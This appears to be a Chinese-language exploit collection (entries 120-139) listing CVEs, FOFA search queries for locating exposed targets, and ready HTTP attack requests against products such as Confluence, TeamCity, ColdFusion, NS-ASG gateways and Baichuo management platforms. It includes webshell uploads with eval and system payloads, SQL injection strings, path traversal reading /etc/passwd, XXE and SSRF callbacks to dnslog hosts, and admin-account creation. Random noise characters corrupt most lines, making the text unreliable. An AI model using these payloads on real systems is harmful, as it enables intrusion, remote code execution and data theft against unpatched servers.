. ~. i- H4 ~8 u9 vsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456" n- I; \' q* [; b$ k$ z+ k
( ?3 s; W( b# b# z
5 X( e f8 @& R" z0 K( g {, Y
120. 北京百绰智能S40管理平台导入web.php任意文件上传$ t6 c6 ?6 `: g
CVE-2024-1253
+ c% b9 r/ S2 d- i! T" rFOFA:title="Smart管理平台"1 g' c8 K% m) G1 H7 y1 n
POST /useratte/web.php? HTTP/1.17 M. s. S, ]% Q; l' k
Host: ip:port/ z& A. ^. q8 o3 F2 y3 A' B. _6 e
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db/ _' Q3 o% }$ n, z
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
) D+ t' r; {# z z, LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- A' z% q, z0 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 t& u) P5 m# Q2 cAccept-Encoding: gzip, deflate
' @9 q* j$ @- mContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328/ d) ]# `3 z1 ]! A1 r- }/ [, o5 H
Content-Length: 597
, d) @ R u; o. [# JOrigin: https://ip:port
% ]( e3 v8 S3 d0 F$ Z6 rReferer: https://ip:port/sysmanage/licence.php
. t8 w3 M( A2 J) v) T1 _1 lUpgrade-Insecure-Requests: 1
+ ~) b! ]$ H9 dSec-Fetch-Dest: document$ P. @) B8 `; R# P
Sec-Fetch-Mode: navigate- G' [+ ]. t4 [
Sec-Fetch-Site: same-origin3 Q" v& ?- t5 u) y0 o7 E' _# p3 g
Sec-Fetch-User: ?1
& x0 z2 u! Z1 w. Y0 y" N) DTe: trailers& f; E8 z3 F' g/ x
Connection: close
- r4 G4 z% u% P2 X9 s% X
; @; X6 u& B1 w5 R; a" L-----------------------------42328904123665875270630079328
`6 ?, w$ v n. S# |Content-Disposition: form-data; name="file_upload"; filename="2.php", c* }5 q& b: ~& {2 ~# G- E
Content-Type: application/octet-stream
; Q* y \& ~1 A6 o3 _/ O3 b5 [* G! U9 g7 {- Z
<?php phpinfo()?>
7 z' l, O0 G0 |/ l-----------------------------42328904123665875270630079328
9 X. G2 ?% U; MContent-Disposition: form-data; name="id_type"
! J" ]+ F5 x. u# i1 P" E" U" H! }( U( `% \4 o/ j' x8 a+ J
1' t7 f; c) `# t3 p* P m- @" O
-----------------------------423289041236658752706300793283 |# j y. H4 b, s
Content-Disposition: form-data; name="1_ck"
# u3 V b5 I; H1 m
6 }/ B0 P- g6 i* t2 y2 J0 }1_radhttp; n" n3 l3 v% f. w; Y4 x* V+ ^( Q @
-----------------------------42328904123665875270630079328- E; n7 J2 w& y
Content-Disposition: form-data; name="mode"
, s1 U" u# U; `. r' g, J* H# Z- P9 T- U
import8 {7 V0 @4 X; _ v% Q4 e/ N+ Z
-----------------------------42328904123665875270630079328$ f! a3 h" l# z u
$ b4 q+ z* g$ n0 a
/ \, b z8 q! E* |文件路径/upload/2.php
. f# {+ Y3 m* ^5 g8 D% I7 ^: t- B7 a( y8 e8 z8 g8 ?
121. 北京百绰智能S42管理平台userattestation.php任意文件上传2 c4 A) u; l4 o* u' u2 ?& k9 E3 t" `2 l
CVE-2024-1918 x- b& x! \( f9 ^( w3 |
FOFA:title="Smart管理平台"
( ~7 l8 V) M8 A$ ^' MPOST /useratte/userattestation.php HTTP/1.1 g- h! G! j1 l; H
Host: 192.168.40.130:8443
6 n; o* p/ U$ F) r1 o, R/ t" kCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac506 Y! y- |; W- _+ `
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
$ k# B2 w1 y' O2 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 T+ x$ O9 b+ ]0 d' p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ v/ ~* Q5 I) X+ j" H
Accept-Encoding: gzip, deflate6 k5 H# _( M! Y& E# y$ q; M' |
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328% |1 H0 U) }$ v5 O i
Content-Length: 592
1 Q& c6 D* h) z2 O7 f; [+ a9 O3 oOrigin: https://192.168.40.130:8443
9 n9 d1 v1 w, VUpgrade-Insecure-Requests: 1
% q O5 K: W& _' [# x; OSec-Fetch-Dest: document# Y2 e- ?+ T) b- f( n$ M
Sec-Fetch-Mode: navigate
# m- f X9 s/ O( G4 A# n# h1 z) s6 p1 ASec-Fetch-Site: same-origin) @0 z3 ~1 K4 `
Sec-Fetch-User: ?1
g: P [5 ?2 @% a# ^- Y( tTe: trailers/ o8 G, @5 [( x' h$ Y/ D, u
Connection: close
$ {/ B/ {" l' E/ }" _; |* E) j0 d! v% T
-----------------------------42328904123665875270630079328& s: p: F$ ~$ ?) T" L% o3 A2 V) R
Content-Disposition: form-data; name="web_img"; filename="1.php"
X) A7 e- o$ e0 ~& ^6 GContent-Type: application/octet-stream
& l8 Z4 s* Q9 s8 x5 r3 [. t! l' D1 ^0 m; e, L) S/ w
<?php phpinfo();?>) O# z. N' c2 O Y
-----------------------------423289041236658752706300793284 {) \% Z5 m1 O8 T
Content-Disposition: form-data; name="id_type") W" J/ N& {( S" ^9 C+ s2 f
. N% Y9 L$ l: g2 p4 B. ~18 s& I( A6 t6 c4 r' Z0 e
-----------------------------42328904123665875270630079328
$ K3 u. W$ a7 B, {5 p1 M6 s2 AContent-Disposition: form-data; name="1_ck"
% s( T+ O' Y+ i% d
( e+ ?4 E s& v N: U7 J1_radhttp
/ P+ O0 o0 F( x+ E7 H-----------------------------42328904123665875270630079328
* {% d. \2 \/ k( Q6 GContent-Disposition: form-data; name="hidwel"
/ Y# N- a% \" ^' ^ w9 ]' C V4 b2 c% s8 B. `2 t$ q
set9 C9 l9 ~& G/ |/ F
-----------------------------42328904123665875270630079328
4 q3 d y$ |. k- Y4 ]
0 d" Z! W; f% _: R. I' ^3 }; O) T9 t" ]
boot/web/upload/weblogo/1.php
2 D# E& G8 ?( {
; `8 _# \5 s# E) z* Z0 o122. 北京百绰智能s200管理平台/importexport.php sql注入7 l, t, ~" e0 k) ]7 E
CVE-2024-27718FOFA:title="Smart管理平台"
1 M' `% a3 G2 @% s其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
8 N6 V, U! B& _* P4 H3 D/ p* HGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.18 k) f9 ^( ~& d7 p( w
Host: x.x.x.x
- r2 T0 e3 o5 _7 N# ^Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
" L+ h( a1 p6 L# @8 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: ~" y# V' _& c. fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" W6 a+ q% d( R) v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ U( q$ z5 j9 Z! i
Accept-Encoding: gzip, deflate, br7 }$ D& Q# h: r- C$ i2 c
Upgrade-Insecure-Requests: 1
) ?+ h' W v( [+ |/ u- ZSec-Fetch-Dest: document& Q4 ^7 \3 C. o' n% V: w$ Z
Sec-Fetch-Mode: navigate
8 |/ Z/ k) Q+ r( oSec-Fetch-Site: none
3 R) f6 D1 h: p9 h. kSec-Fetch-User: ?1
( K' B5 |; F1 | r' XTe: trailers8 c- K9 n- o* ~) O5 y M( b
Connection: close" |% f* d2 a- L! S# h
2 M% D5 _; g+ A: m! G
( `( u: C) q) V1 a' @" j123. Atlassian Confluence 模板注入代码执行& d( L% q$ l$ @% |- L8 V; I
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"/ f3 J" T4 p& F# C1 o( j: B8 V
POST /template/aui/text-inline.vm HTTP/1.1
7 d2 y0 c5 W' h! W) }Host: localhost:8090( k0 g3 D, t7 `2 [+ U. k
Accept-Encoding: gzip, deflate, br
+ O2 o0 [) d7 x( o# P4 }5 z. P3 QAccept: */*. l, P! ^+ C2 ^5 M$ x: N# }
Accept-Language: en-US;q=0.9,en;q=0.8
1 C& D, |. W7 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36. d, W+ \+ Y. f3 H( b
Connection: close9 b; v1 P4 N8 ^4 L" o$ }
Content-Type: application/x-www-form-urlencoded3 `3 V% r! a3 L
# @1 `% W) _9 F$ Klabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})). f9 ~: l/ M% p; ]* o' O
8 r5 \! _/ U; L+ n9 E k' Z7 T! f3 q6 W# x5 R$ M6 L# h
124. 湖南建研工程质量检测系统任意文件上传
* f6 U6 A7 Q. _. ^. t0 ]FOFA:body="/Content/Theme/Standard/webSite/login.css"- L5 S) P/ C& r+ b" q9 Y
POST /Scripts/admintool?type=updatefile HTTP/1.11 a4 c* v/ W- g$ r
Host: 192.168.40.130:8282: g2 `: Z0 B3 R
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36- e4 Y! s! V+ e4 J6 N O: W
Content-Length: 72
7 n! Y, i9 E# UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
4 a% h3 m5 I2 A+ w& c- B# dAccept-Encoding: gzip, deflate, br! x0 }6 R- {- b2 g/ m7 s( n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" Z8 B* |8 l# O3 e+ y% O3 UConnection: close
& z1 Y* m+ u0 |; Q3 _Content-Type: application/x-www-form-urlencoded
( D4 j. L! \$ x3 |4 k- ~
; c- L! n+ U$ ]# |2 @filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>" N2 n7 o+ K( W- n1 k
4 D) p$ S9 x; y5 n$ m1 f
. A! A( E; |" m! Mhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
$ B9 D( F5 g& w. ~0 V, S* u/ i1 M* p$ k! K
125. ConnectWise ScreenConnect身份验证绕过
5 X4 l1 @( g! W. l* w: i9 p5 XCVE-2024-17097 x4 U1 V( v) N
FOFA:icon_hash="-82958153"% y3 [# _% {7 |5 M* r4 v4 B
https://github.com/watchtowrlabs ... bypass-add-user-poc
L- ^: F* u. u( L1 t8 p$ U" ~+ s2 w% }2 K! ^$ D2 J1 V" X4 U" S
' y7 y7 O! F& M使用方法$ O; B N5 b) g s
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
3 s6 X. X5 l8 D. h$ v F$ b+ S5 d3 n; ?6 W) _
% F- f* ~ p- F g c" j
创建好用户后直接登录后台,可以执行系统命令。/ D$ f9 Q) v6 `
& y; K3 v6 l8 N7 Z: I126. Aiohttp 路径遍历
9 P" ~9 D5 B& s8 w6 d8 h: cFOFA:title=="ComfyUI"
& C* s8 A8 w4 x4 MGET /static/../../../../../etc/passwd HTTP/1.1% \( t# I0 V; {9 f( b
Host: x.x.x.x
5 b, T. l1 P4 M. H# W) m( lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
' j, V' _: C# x* [% G' X# nConnection: close
. d5 e1 a8 A, `0 b$ ]" hAccept: */*- |# P9 m5 T+ i; L7 K0 J
Accept-Language: en4 P3 Z9 ^, {0 C! J$ c0 u. F
Accept-Encoding: gzip
1 S0 C4 j2 i& v2 N( E5 o4 E) J) B9 w8 D
7 J& T/ c& E2 P127. 广联达Linkworks DataExchange.ashx XXE4 v4 ?% k% s8 S& ^! m$ o% n
FOFA:body="Services/Identification/login.ashx" # \+ C7 m, @* v% M; t
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1$ J! h2 d7 p/ _3 V2 F' F
Host: 192.168.40.130:8888# h: B% r/ R4 d- x. p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36# I0 y' _# w% o9 u
Content-Length: 415
7 [! ]( O/ d2 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( u5 e9 C8 b2 U; U9 d: uAccept-Encoding: gzip, deflate
6 n& O, D6 }5 k" ~" E4 g; S% iAccept-Language: zh-CN,zh;q=0.91 ?, c( z5 j* Q; H) y
Connection: close0 H# H5 d4 P) N
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0+ L l0 l# B0 }7 C
Purpose: prefetch: c, O) e: R2 c* s2 o$ L& I- S
Sec-Purpose: prefetch;prerender
0 e2 `9 a6 R ]2 V+ w* |
0 h+ c& B+ n: m( c5 _------WebKitFormBoundaryJGgV5l5ta05yAIe0
5 G5 N+ g! g1 x( s; h: XContent-Disposition: form-data;name="SystemName" A! D: }$ b/ W2 |+ h) `% V
% p0 p5 u0 Q# A/ s1 y& S
BIM2 n- t [ F7 n' u: Z! U+ f
------WebKitFormBoundaryJGgV5l5ta05yAIe0( q; m# l9 e4 ]( T {5 L
Content-Disposition: form-data;name="Params"
4 o( ] A' A$ e. T7 @Content-Type: text/plain; b$ @7 z% q# O ?" J4 ~9 n U! t& W
% h) ]5 H7 T$ G/ Q4 a* d<?xml version="1.0" encoding="UTF-8"?>$ g6 a( F2 u% F* p, P, ?
<!DOCTYPE test [3 A1 i/ E6 x7 n d# }- l
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">$ G6 A3 P0 l" w7 Y. z
]
+ _! M5 _/ o6 d. M: ^>
p r! b( f& n, s$ Q<test>&t;</test>
/ j% n/ ~. @8 |% a1 S3 \------WebKitFormBoundaryJGgV5l5ta05yAIe0--
3 V3 i: `9 H( G! b; G3 f& @# e# Z. ?) O0 |
3 Z2 A5 n) Q6 Q, b+ y5 l, o/ {
) m! N5 u9 E; S! o5 V128. Adobe ColdFusion 反序列化6 `- Q; x& y/ H
CVE-2023-382034 J+ i6 r, [* }4 ~
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
9 h# v: N# k5 S3 s. mFOFA:app="Adobe-ColdFusion"
9 q( W9 \4 L9 Q7 V2 KPAYLOAD% K: K8 |; l! }- J/ X$ j- I; ^/ _
) D6 z' @5 d$ e1 F3 Q! W4 ~, X129. Adobe ColdFusion 任意文件读取$ u' W7 A' r. n6 b+ h" X3 t
CVE-2024-20767
- I$ i) z2 a! }8 `) wFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
8 a$ u5 u" p- o0 o, Z第一步,获取uuid9 C) d* z- d, O" t
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1+ {- w/ Y& Z$ r( v7 W- c6 Y
Host: x.x.x.x+ x9 X) G$ Q2 l _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36+ B0 X% U, |: |3 d" j& l2 A
Accept: */*
; e, G$ j$ Q5 }5 _Accept-Encoding: gzip, deflate" S2 F* t) Q0 F* B8 r
Connection: close
' g# A, q. x9 D) L& k) B X( W! z6 U6 D7 |
; E$ V$ b& b3 Y第二步,读取/etc/passwd文件2 Y- h4 ?; v0 X* m5 U" e6 \) y: f
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
h: {, E3 P$ s+ kHost: x.x.x.x" n! \$ T# _+ z& L7 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- u* Y, }2 Y- D/ o8 c4 m8 h
Accept: */*/ n% X, p. s) e% e
Accept-Encoding: gzip, deflate! t: j' E: ^7 |; z( l2 W# e% C
Connection: close
" o+ `) q7 O) \( z! R$ guuid: 85f60018-a654-4410-a783-f81cbd5000b9: M4 \# w! I) V( I9 E* e
( _* o, b+ u* v. `
4 G) r* b9 _: M" _$ Q. V130. Laykefu客服系统任意文件上传
! Y+ Y" t9 q4 e2 s& T0 YFOFA:icon_hash="-334624619"3 W% v1 z* `' Z% A$ \1 Z9 F5 {
POST /admin/users/upavatar.html HTTP/1.1
) \. m. e0 P! b( [1 UHost: 127.0.0.1' e5 q3 E( ~) A% Z
Accept: application/json, text/javascript, */*; q=0.014 y. b. N; f+ M; T
X-Requested-With: XMLHttpRequest
4 W( _* j6 v W& f, x% |" XUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26$ M" Q# n: E6 n( l0 h; L$ v' a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
$ ~4 n( A3 x) N) }Accept-Encoding: gzip, deflate; F% X$ W4 q/ |1 ^
Accept-Language: zh-CN,zh;q=0.9; @* M! m2 k S3 e5 o
Cookie: user_name=1; user_id=3
9 d. N# d& ]6 \5 O$ }7 N; _Connection: close! P3 ~' q+ z% ~+ H/ a
9 X! \& O: J% @2 S------WebKitFormBoundary3OCVBiwBVsNuB2kR
/ i2 S) [1 b2 l+ G& |1 ~ ^0 gContent-Disposition: form-data; name="file"; filename="1.php"
3 A6 V- `1 I# k( MContent-Type: image/png; }8 x' U/ v( S+ ~7 N
" d! I: [( V8 Q! @4 j
<?php phpinfo();@eval($_POST['sec']);?>
+ Q0 R0 i7 T, A/ I5 l------WebKitFormBoundary3OCVBiwBVsNuB2kR--
) R; P. T7 v6 s: ?0 _
" [- T. C0 P/ X, a$ D! o) Y {( T: X5 X. T
131. Mini-Tmall <=20231017 SQL注入
. E1 G6 J6 Y$ Z0 v$ o6 ]" N# _FOFA:icon_hash="-2087517259"
7 V5 W5 V7 T4 Y$ h" s- ?后台地址:http://localhost:8080/tmall/admin
5 s# H7 ~, H* }6 I3 r& h2 `http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)6 m! K4 I5 I, \+ O
' s$ F% H. g& G6 Q132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过' z1 @) b( a; V+ {
CVE-2024-27198 A3 m; Z# R: P7 P' [# D
FOFA:body="Log in to TeamCity"2 k) n7 w: P8 U% d8 F8 V9 _, I
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.13 h/ f. T3 ~, S
Host: 192.168.40.130:81112 J @% b/ K; K8 R( V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& U( v, C N/ _. w* ]6 Q1 D* u1 oAccept: */*
& ~ v( T; X) V4 e; t1 e$ o5 rContent-Type: application/json
# C# E: F& I! Y% H0 |Accept-Encoding: gzip, deflate
1 H' u% [9 m! z6 _6 C$ Q3 ~: b" B7 J3 Z
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}) b Q2 J* ]. q1 E4 k
: [9 b+ P- ~& }: ?6 X2 X5 |6 d) e1 _3 F
CVE-2024-27199( D/ K/ d) y2 b* U8 s& k- j$ i* q
/res/../admin/diagnostic.jsp
! R& ^2 ]( Z" }. w6 v4 n, }/.well-known/acme-challenge/../../admin/diagnostic.jsp f8 R" V o3 V% C3 t) B4 n7 Q
/update/../admin/diagnostic.jsp
8 ]; f: ?; l4 D3 {6 X7 T( x* ?6 q, ^5 N T: z
. @2 e! C. W: |0 z9 k: `CVE-2024-27198-RCE.py2 [' j; k, g4 M& L! t' @ D% K
8 o. |) N( N. x1 J133. H5 云商城 file.php 文件上传
{- B8 o t5 JFOFA:body="/public/qbsp.php" Z T! \6 C. c7 ~6 Z
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1+ ]9 G. x8 R0 F9 ]/ p9 p
Host: your-ip2 I* {/ ~+ I) A8 i/ z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.362 |6 u- d8 F3 d$ g4 U/ u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx5 ~; }3 l( a# c. `# K6 B
" y$ h: b/ Q8 d1 L& U------WebKitFormBoundaryFQqYtrIWb8iBxUCx
4 }' `/ d9 b3 cContent-Disposition: form-data; name="file"; filename="rce.php"& u/ b( I. g8 W* U
Content-Type: application/octet-stream. P2 O1 P8 V* y8 m
) Y) d4 B) u* e<?php system("cat /etc/passwd");unlink(__FILE__);?>
, m/ e. K% K7 ^0 v. C0 E------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
" H8 [3 F3 G: z$ P7 \- O
5 ~- t* d# Q" G N6 p1 M
% k2 F9 A X9 W0 z5 F( v$ t
- i: C& e* O- p9 ^) u6 q134. 网康NS-ASG应用安全网关index.php sql注入
/ d, @* ?: n1 L, i! C% f3 v5 fCVE-2024-2330
/ r/ E1 |* c9 y. aNetentsec NS-ASG Application Security Gateway 6.3版本2 h6 W2 x; |* w! R
FOFA:app="网康科技-NS-ASG安全网关"3 E1 j+ X' U( P3 a+ N) h
POST /protocol/index.php HTTP/1.1
# r# K' Z% ^5 n) [Host: x.x.x.x
1 U/ z) Y0 x/ x/ `. G( [1 OCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
9 P6 v, J% P. V1 p* |1 @# fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0- V/ |4 F+ M4 T" r* i |8 }* M9 a+ x( N
Accept: */*4 B& f, s( t+ ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 k8 j; @! D( N3 hAccept-Encoding: gzip, deflate- m5 d! q7 H" H8 _
Sec-Fetch-Dest: empty( X4 \. c1 m* J7 n6 m) k
Sec-Fetch-Mode: cors
7 k7 z3 g7 p- z/ aSec-Fetch-Site: same-origin" R3 Z+ s& B. x& R$ X y& a$ l2 z/ U
Te: trailers
8 s* J$ o2 W$ u% R z2 CConnection: close! U( O1 h; ^9 s, e1 P
Content-Type: application/x-www-form-urlencoded
+ u. M1 _# s- VContent-Length: 2631 a+ X0 |2 H- B6 ~. \) S
0 |" E, r J: G- ?2 d4 s h6 @
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}' i" |( I! I/ Z# j
" Y: D5 E+ n6 [6 E2 ~5 H5 o
+ G7 c' C/ s1 b) g3 K0 i& C$ F
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
( A/ W; ~# v; ?, uCVE-2024-2022) i: F5 [) h( B ^
Netentsec NS-ASG Application Security Gateway 6.3版本& N- |/ f( J( ]: l! B, ?+ ^
FOFA:app="网康科技-NS-ASG安全网关"
0 }" @$ Y4 w& w6 g' c! g% I _# kGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1: \6 t) T# @3 ^% x. K; H! e; C& _
Host: x.x.x.x* V4 s" t0 r2 M( v+ V& W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. q# x' P/ s4 S) L' z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; u8 W0 _6 l# _+ |9 J. ?0 L0 } L
Accept-Encoding: gzip, deflate
; C3 |' J$ Q% ?, e# wAccept-Language: zh-CN,zh;q=0.9
* S0 b) X+ B& `& kConnection: close9 h, L8 w u! H( r
( U: U) Z* X( e0 X1 U% A" ]/ Z9 s3 C) V9 A# L, U! e' s A
136. NextChat cors SSRF
- A( n- H$ k4 t. r7 T2 cCVE-2023-49785
$ h+ I) g# u. O% G% e) k" y. dFOFA:title="NextChat"
% Y, l. T+ ? L# O1 [; E; V% r0 }) RGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
! G% ^& _# N. v& e% aHost: x.x.x.x:10000! Z$ a: t8 {3 }) n! H% S: y0 R$ i
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ u8 E0 v% N. G" u/ MConnection: close* u# ?' c' d2 k: A4 t2 s3 l! E3 c; V
Accept: */*
( f+ S. I J) n2 z- }( ?Accept-Language: en
+ q. J2 i; e0 z" tAccept-Encoding: gzip) e3 E/ }7 ^) y7 w* ]' x
; i) k: t3 P9 Z+ Y2 W: b2 [. Y8 g# p. I* x! P; H. a& p I. E0 _
137. 福建科立迅通信指挥调度平台down_file.php sql注入
' @5 F0 ?3 a5 g3 y i- VCVE-2024-2620) k6 ?! [3 R/ K( B: b0 }2 P8 Z1 }
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
6 P# e2 O, g' }7 f/ JGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.13 ~0 D8 ?7 t, _! U/ |$ i
Host: x.x.x.x1 d0 h+ K/ D& E |0 z6 f! V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* t1 P( ~4 {# o) z4 p: BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 d/ w: z4 t M6 I& f* v$ U9 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
T. f W3 C0 Y7 }Accept-Encoding: gzip, deflate, br3 b: R& L$ o* ?' A0 j: Q. ?3 T
Connection: close2 D$ o1 h1 G% H4 v# n6 ]7 Y
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
# S9 O( G4 V$ w7 ~( fUpgrade-Insecure-Requests: 19 y8 D- S0 I4 P' i# ]/ v( X
e# ? a& M9 T. @1 \
) J2 p4 k1 c; C/ X! r* V! f( \
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入( A- M: ?+ T" l3 ~5 l! l7 A V
CVE-2024-2621: J. L' Y, T) x: @; E! [9 |, ~/ ]% q, l
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 `$ ?& a8 ]9 t# M
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.18 o5 v: i- |$ q. y' |- a- W
Host: x.x.x.x
# E8 a* V2 g! {1 ~0 l. {. P9 T! ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( H- r5 C: O0 u5 L! O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 H9 T, w8 L1 N- t) e' B, V4 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 a! E, c/ G: p. N/ ~3 }0 LAccept-Encoding: gzip, deflate, br) N+ } E+ T! I# \5 {' n& h
Connection: close, E: L& M6 _" r0 B+ K5 h
Upgrade-Insecure-Requests: 1
6 C n1 X1 I2 S1 t* i5 Z3 M/ h6 I% o1 g8 W
- c% o! ~7 V' z8 @9 ^" d
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
- `& {6 {( B, h! V6 lCVE-2024-2622
0 P1 X6 `. A* I# ?5 OFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"1 E5 j( ^! N4 t
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1" h: N' Z$ S, t3 O
Host: x.x.x.x
" ~2 m9 e' n8 l* CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.01 a/ B5 ?; k8 r+ W" d
